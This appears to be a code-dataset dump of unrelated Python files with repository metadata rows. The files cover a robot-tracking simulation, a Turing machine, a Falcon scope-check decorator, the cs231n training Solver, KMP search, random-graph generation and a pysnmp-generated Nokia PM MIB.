            if n_sim%int(0.5/Te) == 0:
                appendErrors(errList)
                print(time.perf_counter()-t0, "/ 0.5") # wall time spent simulating 0.5 s
                t0 = time.perf_counter()
                if trace:
                    # leave trajectory dots on the main axes
                    ax.plot(cible._x, cible._y, '.', color='k', lw=0.1)
                    ax.plot(suiveur._x, suiveur._y, '.', color='r', lw=0.1)
    if save: errFile.close()
def animation(i):
    """FuncAnimation callback for the main figure: drawing is done by the
    worker thread, so there are no artists to update here."""
    return []
# Initialisation de la fenêtre et des axes des erreurs
figE, axE = plt.subplots(2,2,figsize=(12, 6))
figE.canvas.mpl_connect('key_press_event', onPress)
figE.canvas.mpl_connect('key_release_event', onRelease)
figE.canvas.mpl_connect('close_event', stop)
# drop matplotlib's default key bindings on this figure as well
figE.canvas.mpl_disconnect(figE.canvas.manager.key_press_handler_id)
# Mise a jour des erreurs
def appendErrors(errList):
    """Record one error sample in the global history (sampled every 0.5 s)."""
    global n_err
    temps.append(n_err * 0.5)
    samples = ((0, 0, errList.XY), (0, 1, errList.TH),
               (1, 0, errList.X), (1, 1, errList.Y))
    for row, col, value in samples:
        erreurs[row][col].append(value)
    n_err += 1
def init_errors():
    """Initial draw of the four error subplots (position, angle, X, Y)."""
    axE[0][0].set_ylabel('Erreur position')
    axE[0][1].set_ylabel('Erreur angulaire')
    axE[1][0].set_ylabel('Erreur X')
    axE[1][1].set_ylabel('Erreur Y')
    # seed the history with the current errors so the curves start populated
    errList = suiveur.handleErrors()
    appendErrors(errList)
    for k in range(0, 2):
        for m in range(0, 2):
            axE[k][m].plot(temps, erreurs[k][m], '.-', color='#1f77ba', lw=2)
            axE[k][m].set_xlim((0, 0.5))
            axE[k][m].grid()
def errors(i):
    """FuncAnimation callback: redraw the error curves while running."""
    global pause, Te, n_err, n_sim
    if not pause:
        for k in range(0, 2):
            for m in range(0, 2):
                axE[k][m].plot(temps, erreurs[k][m], color='#1f77ba', lw=2)
                # stretch the x-axis to cover all recorded samples
                axE[k][m].set_xlim((0, n_err*0.5))
# Initialisation des paramètres et des robots
Te = 0.005     # simulation time step [s]
trace = True   # leave trajectory dots on the main axes
save = False   # log error records to erreurs.txt
cible = Cible(3, 3, 0, ax, 'k', 1, 2, Te, "huit") # ligne / cercle / huit / random / custom / control
suiveur = Suiveur(1, 1, 180, ax, 'r', cible)
# legend drawn as text boxes on the main axes
ax.text(0.03, 0.95, '- Robot suiveur', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, color=suiveur._color, fontsize=10, bbox={'facecolor': 'white', 'alpha': 0.8, 'pad': 13})
ax.text(0.03, 0.93, '- Robot cible', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, color=cible._color, fontsize=10)
ax.text(0.03, 0.97, 'Légende :', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, color='k', fontsize=10)
# start both animations, run the physics in a background thread, show the UI
anim = FuncAnimation(fig, animation, frames=30000, interval=20, cache_frame_data=False, save_count=0, repeat=False)
err = FuncAnimation(figE, errors, init_func=init_errors, frames=1200, interval=500, cache_frame_data=False, save_count=0, repeat=False)
Thread(target=simulation).start()
plt.show()
"[email protected]"
] | |
0f3a73e751671254e4991470d00ff51b9c7ef8c4 | 1ace6b79b41b69006de37fe936964b3087e67736 | /1-5.py | 9f9b5076ac092e9e7cb6d4f14ebb4149b3ebfd2c | [] | no_license | thlong78984278/Crypto | 77f38d94e727a7872f89cd565b675024f0a7c932 | 2f3f46aa744c7292f6e31260b05329bc0cada817 | refs/heads/main | 2023-04-11T09:11:06.785153 | 2021-04-21T13:54:06 | 2021-04-21T13:54:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | from turing_machine import TuringMachine2
# Transition table for a machine that accepts strings of the form 0^n 1^n:
# each pass marks the leftmost unmarked 0 and the rightmost unmarked 1 with
# an X, then walks back; it accepts ("y") once only X's remain and rejects
# ("n") on any mismatch.
# NOTE(review): entries map (state, symbol) -> (state, action), where the
# action is either a symbol to write or a head move ("R"/"L") — presumably
# TuringMachine2 performs one operation per step; confirm in turing_machine.
transition_function = {
    ("init"," "):("q0","R"),
    ("q0","0"):("q1","X"),      # mark the leftmost remaining 0
    ("q0","1"):("n","1"),       # a 1 before any unmarked 0 -> reject
    ("q0","X"):("y","X"),       # everything marked -> accept
    ("q1","X"):("q2","R"),
    ("q2","0"):("q2","R"),      # skip the remaining 0s
    ("q2","X"):("n","X"),
    ("q2","1"):("q3","R"),
    ("q3","1"):("q3","R"),      # skip the 1s up to the right end
    ("q3","0"):("n","0"),
    ("q3"," "):("q4","L"),
    ("q3","X"):("q4","L"), # ->|
    ("q4","1"):("q5","X"),      # mark the rightmost remaining 1
    ("q5","X"):("q6","L"),
    ("q6","0"):("q6","L"),      # walk back to the left X marker
    ("q6","1"):("q6","L"),
    ("q6","X"):("q0","R")
    }
# example tape after one pass over 00001111:
# X0001110 -> leftmost 0 and rightmost 1 replaced by X
final_states = { "n", "y"}
# input tape: a blank followed by 0^5 1^5 (should be accepted)
t = TuringMachine2(" 0000011111",
                   initial_state="init",
                   final_states=final_states,
                   transition_function=transition_function)
print("Input on tape:\n", t.get_tape())
# run until the machine halts in an accepting/rejecting state
while not t.final():
    t.step()
"[email protected]"
] | |
67878e053fb1001efd8f2518f446de52112fa2b8 | 940bb431eff5192f7332e749fba0a4874630beb8 | /src/middleware_security/utils.py | 81cdf4f30af14ea902c502d845cfa62dcef032db | [] | no_license | red-cientifica-peruana/middleware-security | 63c9374f3547cb5ed4b4848860f1f976aba457b7 | 23479f532d26353291c2972881a29a7df31f2f5c | refs/heads/master | 2021-01-12T10:15:19.866181 | 2018-07-18T14:55:37 | 2018-07-18T14:55:37 | 76,400,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,560 | py | from functools import wraps
from falcon_exceptions import HTTPException
def scope_verify(scope=None):
    """Decorator that checks the caller's token scopes before running the
    decorated resource method.

    The required scope is, in order of precedence: the `scope` argument, or
    the resource's `scope` attribute (args[0].scope).  When that object is a
    dict it is keyed by HTTP verb, derived from the method name (e.g.
    `on_get` -> "get").  A scope is the string "app:resource:action"; the
    request is authorized when request.context['token_scopes'][app][resource]
    contains the action.  Requests without 'token_scopes' in their context
    are let through unverified.

    Raises:
        HTTPException(500) when no scope is configured or it is malformed.
        HTTPException(403) when the token does not grant the scope.
    """
    def method_decorator(func):
        @wraps(func)
        def method_wrapper(*args, **kwargs):
            scope_obj = args[0].scope if not scope else scope
            context = args[1].context
            if isinstance(scope_obj, dict):
                # pick the verb-specific scope, e.g. on_get -> key "get"
                func_name = func.__name__.split('_')
                scope_obj = scope_obj.get(func_name[1], None)
            if 'token_scopes' not in context:
                # no token on the request: nothing to verify
                return func(*args, **kwargs)
            if scope_obj is None:
                raise HTTPException(500, "The scope was not set correctly")
            token_scopes = context['token_scopes']
            parts_scope = scope_obj.split(':')
            if len(parts_scope) != 3:
                raise HTTPException(500, "The scope was not set correctly")
            if (parts_scope[0] not in token_scopes or
                    parts_scope[1] not in token_scopes[parts_scope[0]] or
                    parts_scope[2] not in token_scopes[parts_scope[0]][parts_scope[1]]):
                raise HTTPException(
                    403,
                    dev_msg="You are not authorized to perform this action",
                    user_msg="No se encuentra autorizado para realizar esta acción")
            # BUG FIX: propagate the wrapped function's return value (the
            # original discarded it in every branch).
            return func(*args, **kwargs)
        return method_wrapper
    return method_decorator
| [
"[email protected]"
] | |
bc4d884d0c92d2823f1ba3f94f059e5ec5ea1670 | 3586b39f6c2a587077dd60cd518e862b65bec47e | /100-Days-of-Python/Day-17/main.py | 80d3a1a2fda636bef136753773feeee959abd5aa | [] | no_license | hpisme/Python-Projects | 9e7f483a228ab18f4cb22810a8e23cf379f315bc | 2d8605c324c30e83390dafd6bf63b164372905ba | refs/heads/main | 2023-05-20T12:40:37.122173 | 2021-06-05T23:18:14 | 2021-06-05T23:18:14 | 367,402,588 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | from question_model import Question
from data import question_data
from quiz_brain import QuizBrain
# Build Question objects from the raw quiz data, then run the quiz until
# every question has been asked and report the final score.
question_bank = [
    Question(entry["text"], entry["answer"]) for entry in question_data
]
new_quiz = QuizBrain(question_bank)
while new_quiz.still_has_questions():
    new_quiz.next_question()
print("You've completed the quiz.")
print(f"Your final score is {new_quiz.score} / {len(question_bank)}")
| [
"[email protected]"
] | |
14082e84e8cc42dec1bcbc028a0ce10087db4dd4 | 4d4fcde3efaa334f7aa56beabd2aa26fbcc43650 | /server/src/uds/migrations/0039_auto_20201111_1329.py | 4d48ca91318e70def9c7828155e6812d0e528f18 | [] | no_license | xezpeleta/openuds | a8b11cb34eb0ef7bb2da80f67586a81b2de229ef | 840a7a02bd7c9894e8863a8a50874cdfdbf30fcd | refs/heads/master | 2023-08-21T17:55:48.914631 | 2021-10-06T10:39:06 | 2021-10-06T10:39:06 | 414,489,331 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | # Generated by Django 3.1.2 on 2020-11-11 13:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('uds', '0038_auto_20200505_config'),
]
operations = [
migrations.RemoveField(
model_name='metapool',
name='accessCalendars',
),
migrations.RemoveField(
model_name='metapool',
name='pools',
),
migrations.RemoveField(
model_name='servicepool',
name='accessCalendars',
),
migrations.RemoveField(
model_name='servicepool',
name='actionsCalendars',
),
]
| [
"[email protected]"
] | |
9177310144ac6320e28207fa88ccaac564986c25 | f827a5caefb76c3b34bc4264f05b8f6e02846be8 | /assignment2/cs231n/solver.py | 1733b52c5e35c740651ea2c8c0403545dbd73e37 | [] | no_license | kujira70/CS231 | 8cdf279d231088f3a7b4068e2199394c2ff2e2c2 | 8c837bc7ec2afece1aebcf0724dd18908aec61c9 | refs/heads/master | 2022-04-26T01:10:20.259944 | 2022-04-17T03:35:10 | 2022-04-17T03:35:10 | 138,230,742 | 1 | 0 | null | 2018-06-21T23:08:04 | 2018-06-21T23:08:04 | null | UTF-8 | Python | false | false | 12,147 | py | from __future__ import print_function, division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import object
import os
import pickle as pickle
import numpy as np
from cs231n import optim
class Solver(object):
    """
    A Solver encapsulates all the logic necessary for training classification
    models. The Solver performs stochastic gradient descent using different
    update rules defined in optim.py.
    The solver accepts both training and validation data and labels so it can
    periodically check classification accuracy on both training and validation
    data to watch out for overfitting.
    To train a model, you will first construct a Solver instance, passing the
    model, dataset, and various options (learning rate, batch size, etc) to the
    constructor. You will then call the train() method to run the optimization
    procedure and train the model.
    After the train() method returns, model.params will contain the parameters
    that performed best on the validation set over the course of training.
    In addition, the instance variable solver.loss_history will contain a list
    of all losses encountered during training and the instance variables
    solver.train_acc_history and solver.val_acc_history will be lists of the
    accuracies of the model on the training and validation set at each epoch.
    Example usage might look something like this:
    data = {
      'X_train': # training data
      'y_train': # training labels
      'X_val': # validation data
      'y_val': # validation labels
    }
    model = MyAwesomeModel(hidden_size=100, reg=10)
    solver = Solver(model, data,
                    update_rule='sgd',
                    optim_config={
                      'learning_rate': 1e-3,
                    },
                    lr_decay=0.95,
                    num_epochs=10, batch_size=100,
                    print_every=100)
    solver.train()
    A Solver works on a model object that must conform to the following API:
    - model.params must be a dictionary mapping string parameter names to numpy
      arrays containing parameter values.
    - model.loss(X, y) must be a function that computes training-time loss and
      gradients, and test-time classification scores, with the following inputs
      and outputs:
    Inputs:
    - X: Array giving a minibatch of input data of shape (N, d_1, ..., d_k)
    - y: Array of labels, of shape (N,) giving labels for X where y[i] is the
      label for X[i].
    Returns:
    If y is None, run a test-time forward pass and return:
    - scores: Array of shape (N, C) giving classification scores for X where
      scores[i, c] gives the score of class c for X[i].
    If y is not None, run a training time forward and backward pass and
    return a tuple of:
    - loss: Scalar giving the loss
    - grads: Dictionary with the same keys as self.params mapping parameter
      names to gradients of the loss with respect to those parameters.
    """
    def __init__(self, model, data, **kwargs):
        """
        Construct a new Solver instance.
        Required arguments:
        - model: A model object conforming to the API described above
        - data: A dictionary of training and validation data containing:
          'X_train': Array, shape (N_train, d_1, ..., d_k) of training images
          'X_val': Array, shape (N_val, d_1, ..., d_k) of validation images
          'y_train': Array, shape (N_train,) of labels for training images
          'y_val': Array, shape (N_val,) of labels for validation images
        Optional arguments:
        - update_rule: A string giving the name of an update rule in optim.py.
          Default is 'sgd'.
        - optim_config: A dictionary containing hyperparameters that will be
          passed to the chosen update rule. Each update rule requires different
          hyperparameters (see optim.py) but all update rules require a
          'learning_rate' parameter so that should always be present.
        - lr_decay: A scalar for learning rate decay; after each epoch the
          learning rate is multiplied by this value.
        - batch_size: Size of minibatches used to compute loss and gradient
          during training.
        - num_epochs: The number of epochs to run for during training.
        - print_every: Integer; training losses will be printed every
          print_every iterations.
        - verbose: Boolean; if set to false then no output will be printed
          during training.
        - num_train_samples: Number of training samples used to check training
          accuracy; default is 1000; set to None to use entire training set.
        - num_val_samples: Number of validation samples to use to check val
          accuracy; default is None, which uses the entire validation set.
        - checkpoint_name: If not None, then save model checkpoints here every
          epoch.
        """
        self.model = model
        self.X_train = data['X_train']
        self.y_train = data['y_train']
        self.X_val = data['X_val']
        self.y_val = data['y_val']
        # Unpack keyword arguments
        self.update_rule = kwargs.pop('update_rule', 'sgd')
        self.optim_config = kwargs.pop('optim_config', {})
        self.lr_decay = kwargs.pop('lr_decay', 1.0)
        self.batch_size = kwargs.pop('batch_size', 100)
        self.num_epochs = kwargs.pop('num_epochs', 10)
        self.num_train_samples = kwargs.pop('num_train_samples', 1000)
        self.num_val_samples = kwargs.pop('num_val_samples', None)
        self.checkpoint_name = kwargs.pop('checkpoint_name', None)
        self.print_every = kwargs.pop('print_every', 10)
        self.verbose = kwargs.pop('verbose', True)
        # Throw an error if there are extra keyword arguments
        if len(kwargs) > 0:
            extra = ', '.join('"%s"' % k for k in list(kwargs.keys()))
            raise ValueError('Unrecognized arguments %s' % extra)
        # Make sure the update rule exists, then replace the string
        # name with the actual function
        if not hasattr(optim, self.update_rule):
            raise ValueError('Invalid update_rule "%s"' % self.update_rule)
        self.update_rule = getattr(optim, self.update_rule)
        self._reset()
    def _reset(self):
        """
        Set up some book-keeping variables for optimization. Don't call this
        manually.
        """
        # Set up some variables for book-keeping
        self.epoch = 0
        self.best_val_acc = 0
        self.best_params = {}
        self.loss_history = []
        self.train_acc_history = []
        self.val_acc_history = []
        # Make a deep copy of the optim_config for each parameter
        # (each parameter keeps its own state, e.g. momentum buffers)
        self.optim_configs = {}
        for p in self.model.params:
            d = {k: v for k, v in self.optim_config.items()}
            self.optim_configs[p] = d
    def _step(self):
        """
        Make a single gradient update. This is called by train() and should not
        be called manually.
        """
        # Make a minibatch of training data
        # (indices are drawn with replacement by np.random.choice)
        num_train = self.X_train.shape[0]
        batch_mask = np.random.choice(num_train, self.batch_size)
        X_batch = self.X_train[batch_mask]
        y_batch = self.y_train[batch_mask]
        # Compute loss and gradient
        loss, grads = self.model.loss(X_batch, y_batch)
        self.loss_history.append(loss)
        # Perform a parameter update
        for p, w in self.model.params.items():
            dw = grads[p]
            config = self.optim_configs[p]
            next_w, next_config = self.update_rule(w, dw, config)
            self.model.params[p] = next_w
            self.optim_configs[p] = next_config
    def _save_checkpoint(self):
        # No-op unless a checkpoint name was configured.
        if self.checkpoint_name is None: return
        checkpoint = {
          'model': self.model,
          'update_rule': self.update_rule,
          'lr_decay': self.lr_decay,
          'optim_config': self.optim_config,
          'batch_size': self.batch_size,
          'num_train_samples': self.num_train_samples,
          'num_val_samples': self.num_val_samples,
          'epoch': self.epoch,
          'loss_history': self.loss_history,
          'train_acc_history': self.train_acc_history,
          'val_acc_history': self.val_acc_history,
        }
        # One pickle file per epoch, e.g. "<name>_epoch_3.pkl".
        filename = '%s_epoch_%d.pkl' % (self.checkpoint_name, self.epoch)
        if self.verbose:
            print('Saving checkpoint to "%s"' % filename)
        with open(filename, 'wb') as f:
            pickle.dump(checkpoint, f)
    def check_accuracy(self, X, y, num_samples=None, batch_size=100):
        """
        Check accuracy of the model on the provided data.
        Inputs:
        - X: Array of data, of shape (N, d_1, ..., d_k)
        - y: Array of labels, of shape (N,)
        - num_samples: If not None, subsample the data and only test the model
          on num_samples datapoints.
        - batch_size: Split X and y into batches of this size to avoid using
          too much memory.
        Returns:
        - acc: Scalar giving the fraction of instances that were correctly
          classified by the model.
        """
        # Maybe subsample the data
        N = X.shape[0]
        if num_samples is not None and N > num_samples:
            mask = np.random.choice(N, num_samples)
            N = num_samples
            X = X[mask]
            y = y[mask]
        # Compute predictions in batches
        # (round up so a partial final batch is still evaluated)
        num_batches = N // batch_size
        if N % batch_size != 0:
            num_batches += 1
        y_pred = []
        for i in range(num_batches):
            start = i * batch_size
            end = (i + 1) * batch_size
            scores = self.model.loss(X[start:end])
            y_pred.append(np.argmax(scores, axis=1))
        y_pred = np.hstack(y_pred)
        acc = np.mean(y_pred == y)
        return acc
    def train(self):
        """
        Run optimization to train the model.
        """
        num_train = self.X_train.shape[0]
        iterations_per_epoch = max(num_train // self.batch_size, 1)
        num_iterations = self.num_epochs * iterations_per_epoch
        for t in range(num_iterations):
            self._step()
            # Maybe print training loss
            if self.verbose and t % self.print_every == 0:
                print('(Iteration %d / %d) loss: %f' % (
                       t + 1, num_iterations, self.loss_history[-1]))
            # At the end of every epoch, increment the epoch counter and decay
            # the learning rate.
            epoch_end = (t + 1) % iterations_per_epoch == 0
            if epoch_end:
                self.epoch += 1
                # Multiplicative decay applied to every parameter's config.
                for k in self.optim_configs:
                    self.optim_configs[k]['learning_rate'] *= self.lr_decay
            # Check train and val accuracy on the first iteration, the last
            # iteration, and at the end of each epoch.
            first_it = (t == 0)
            last_it = (t == num_iterations - 1)
            if first_it or last_it or epoch_end:
                train_acc = self.check_accuracy(self.X_train, self.y_train,
                    num_samples=self.num_train_samples)
                val_acc = self.check_accuracy(self.X_val, self.y_val,
                    num_samples=self.num_val_samples)
                self.train_acc_history.append(train_acc)
                self.val_acc_history.append(val_acc)
                self._save_checkpoint()
                if self.verbose:
                    print('(Epoch %d / %d) train acc: %f; val_acc: %f' % (
                           self.epoch, self.num_epochs, train_acc, val_acc))
                # Keep track of the best model
                # (a snapshot of the params with the best validation accuracy)
                if val_acc > self.best_val_acc:
                    self.best_val_acc = val_acc
                    self.best_params = {}
                    for k, v in self.model.params.items():
                        self.best_params[k] = v.copy()
        # At the end of training swap the best params into the model
        self.model.params = self.best_params
| [
"[email protected]"
] | |
2e0ccc75e8c2d4ee4a8d8c0cbb29d30c6e44106e | bdd7779b8fd15e96ed09111843e3f202108b78fd | /cos1.py | e12c34abc8d6e5f995c2b104df912270bdd3a28f | [] | no_license | s22624-pjwstk/konsulatacje | aa63216e96e5cfa1a25ab27853cad2920ab8b1f9 | 8742f806d8ca8413a4a833017cdcfc1ef436e78a | refs/heads/main | 2023-03-27T07:04:18.569441 | 2021-03-30T19:41:54 | 2021-03-30T19:41:54 | 353,121,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | def cos(x):
print(x)
cos(2)
def zewnetrzna(a):
    """Closure demo: an inner helper prints the enclosing argument."""
    def _pokaz():
        print(a)
    _pokaz()
zewnetrzna(3)
def operator(s):
    """Return the arithmetic function matching symbol ``s`` ("+" or "-").

    Any other symbol yields ``None``.
    """
    def plus(a, b):
        return a + b
    def minus(a, b):
        return a - b
    # Dispatch table instead of an if/elif chain; .get gives None otherwise.
    return {"+": plus, "-": minus}.get(s)
o = operator("+")
print(o)
print(o(2, 3))
def add(n):
    """Curried addition: ``add(n)(x) == n + x``."""
    return lambda x: n + x
print(add(1)(2))
def mr(fn):
    """Decorator that prefixes the string argument with "mr " before calling fn."""
    def jakkolwiek(s):
        return fn("mr {}".format(s))
    return jakkolwiek
@mr
def hello(s):
    return "hello {}".format(s)
print(hello("Darek")) | [
"[email protected]"
] | |
d1e8f367dd86118abe6879d5f86109637b40400a | 3b36a274dc6b6aa4417fc6d859436d5f50f208b7 | /KMP.py | 3b82377f2029ab61c092e42a95ed8f8d7ceaddb9 | [] | no_license | saife245/ALGORITHM-AND-DATA-STRUCTURE | 66baca2ba63d3b2cffcdafc19cd82913d18f47be | cd7145beaf0973463805abff5c498b98e2e88c80 | refs/heads/master | 2020-03-28T06:16:26.058603 | 2018-11-17T18:26:15 | 2018-11-17T18:26:15 | 147,824,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | def KMP(pattern, string):
m = len(pattern)
n = len(string)
s = [0]*(n)
j = 0
calc_next(pattern, m, s)
i = 0
while i < n:
if pattern[j] == string[i]:
i += 1
j += 1
if j == m:
print ("Found at " + str(i-j))
j = s[j-1]
elif i < n and pattern[j] != string[i]:
if j != 0:
j = s[j-1]
else:
i += 1
def calc_next(pattern, n, s):
    """Fill ``s`` in place with the KMP failure function of ``pattern[:n]``.

    After the call, ``s[i]`` is the length of the longest proper prefix of
    ``pattern[:i + 1]`` that is also a suffix of it; ``s[0]`` is always 0.

    Args:
        pattern: The pattern string.
        n: Number of characters of ``pattern`` to process.
        s: Pre-allocated list of length >= n, overwritten with the table.
    """
    l = 0           # length of the current longest prefix-suffix border
    s[0] = 0        # fix: original had the no-op bare expression ``s[0]``
    i = 1
    while i < n:
        if pattern[i] == pattern[l]:
            l += 1
            s[i] = l
            i += 1
        elif l != 0:
            # Mismatch: fall back to the previous border, do not advance i.
            l = s[l - 1]
        else:
            s[i] = 0
            i += 1
# Demo input: report every index at which ``pattern`` occurs in ``string``.
string = "banananobano"
pattern = "nano"
KMP(pattern, string) | [
"[email protected]"
] | |
f09d106fdba174b4d50bd24e47c76d79bcff3de6 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/galex_j16155+5048/sdB_galex_j16155+5048_coadd.py | 910403f482b6eda6d8e12bdf3a0cae2ad2051389 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from gPhoton.gMap import gMap
def main():
    """Run a gPhoton NUV gMap extraction for sdB_galex_j16155+5048."""
    # NOTE(review): cntfile lives under .../sdBs/... while cntcoaddfile uses
    # .../sdB/... — possibly intentional, confirm against the output layout.
    params = {
        "band": "NUV",
        "skypos": [243.88925, 50.807131],
        "skyrange": [0.0333333333333, 0.0333333333333],
        "stepsz": 30.,
        "cntfile": "/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_galex_j16155+5048/sdB_galex_j16155+5048_movie_count.fits",
        "cntcoaddfile": "/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_galex_j16155+5048/sdB_galex_j16155+5048_count_coadd.fits",
        "overwrite": True,
        "verbose": 3,
    }
    gMap(**params)
if __name__ == "__main__":
    main()
| [
"[email protected]"
] | |
520f84d54ac2da80bd3c31865bc75383a40b08e6 | 77f9dc39ea7bbf904201ccfda9a806ce8c68605d | /hamiltonian_cycle/erdos_renyi_model_generation.py | fce71db43449b9c453ae3476eddd7a16fdb42fa8 | [] | no_license | TzuriR/Complex-Networks | c5787ab5be27d9c4356dd12e36deb5f0f11a8ac0 | 76cd862193e699799d87177a19b7cd792eaf7a52 | refs/heads/main | 2023-06-05T10:43:02.045696 | 2021-06-23T18:36:26 | 2021-06-23T18:36:26 | 308,382,110 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py | import networkx as nx
import matplotlib.pyplot as plt
# Generate graph
def gen_graph(n, p):
    """Generate, display and return an Erdos-Renyi random graph G(n, p).

    Args:
        n: Number of nodes.
        p: Probability of an edge between each pair of nodes.

    Side effects: prints the node and edge lists, draws the graph with
    labels, saves the figure to ``simple_path.png`` and shows it on screen.

    Returns:
        The generated networkx graph.
    """
    g = nx.generators.random_graphs.erdos_renyi_graph(n, p)
    print("g.nodes:", g.nodes)
    print("g.edges:", g.edges)
    nx.draw(g, with_labels=True)
    plt.savefig("simple_path.png")
    plt.show()
    # A large block (~80 lines) of hand-built example graphs previously sat
    # here inside a no-op triple-quoted string literal (dead code). It was
    # removed for clarity; recover it from version control if needed.
    return g
| [
"[email protected]"
] | |
04b8ed50c24c320d25836ef6911aab27ca4dc7b7 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP.py | da7cb8b996dbd193802a4c80260e2d37c3f3b78e | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 17,953 | py | #
# PySNMP MIB module NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP
# Produced by pysmi-0.3.4 at Wed May 1 14:23:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint")
NoiAdditionalText, NoiEventTime, NoiAlarmTableCount = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-COMMON-DEFINITION", "NoiAdditionalText", "NoiEventTime", "NoiAlarmTableCount")
NoiMeasurementJobStatus, NoiMeasurementResultTransfer, NoiMeasurementResultIdentifier, NoiMeasurementFileTransfer, NoiMeasurementFileName, NoiMeasurementActivationError, NoiMeasurementFileDirectory = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-COMMON-DEFINITION", "NoiMeasurementJobStatus", "NoiMeasurementResultTransfer", "NoiMeasurementResultIdentifier", "NoiMeasurementFileTransfer", "NoiMeasurementFileName", "NoiMeasurementActivationError", "NoiMeasurementFileDirectory")
noiPmTable, noiPmCompliance, noiPmVariable, noiOpenInterfaceModule, noiPmNotification = mibBuilder.importSymbols("NOKIA-NE3S-REGISTRATION-MIB", "noiPmTable", "noiPmCompliance", "noiPmVariable", "noiOpenInterfaceModule", "noiPmNotification")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Gauge32, ModuleIdentity, NotificationType, Bits, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, iso, ObjectIdentity, Counter32, Counter64, TimeTicks, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "ModuleIdentity", "NotificationType", "Bits", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "iso", "ObjectIdentity", "Counter32", "Counter64", "TimeTicks", "Integer32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
noiSnmpPmIrp = ModuleIdentity((1, 3, 6, 1, 4, 1, 94, 7, 1, 1, 4))
noiSnmpPmIrp.setRevisions(('1970-01-01 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: noiSnmpPmIrp.setRevisionsDescriptions(('Version 1.0.6',))
if mibBuilder.loadTexts: noiSnmpPmIrp.setLastUpdated('200227020000Z')
if mibBuilder.loadTexts: noiSnmpPmIrp.setOrganization('Nokia Networks')
if mibBuilder.loadTexts: noiSnmpPmIrp.setContactInfo('e-mail: NET-OSS-OPEN-SNMP DL (Microsoft Outlook, Nokia internal) [email protected]')
if mibBuilder.loadTexts: noiSnmpPmIrp.setDescription('This SNMP MIB-module specifies the SNMP Solution Set of the PM Integration Reference Point (IRP) also known as Enhanced SNMP Solution Suite. The purpose of this IRP is to define an interface though which a network element manager or a network element) can communicate PM information for its managed objects to Nokia OS, NetAct.')
noiPmIrpVersion = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmIrpVersion.setStatus('current')
if mibBuilder.loadTexts: noiPmIrpVersion.setDescription("This object represents the version of the PM IRP supported by the agent. The format is 'n.m,o', where 'n' is the main version number of the interface model and 'm' and 'o' the release number within the main version. This version is 1.0.6")
noiPmFileTransferProtocol = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 2), NoiMeasurementFileTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setStatus('current')
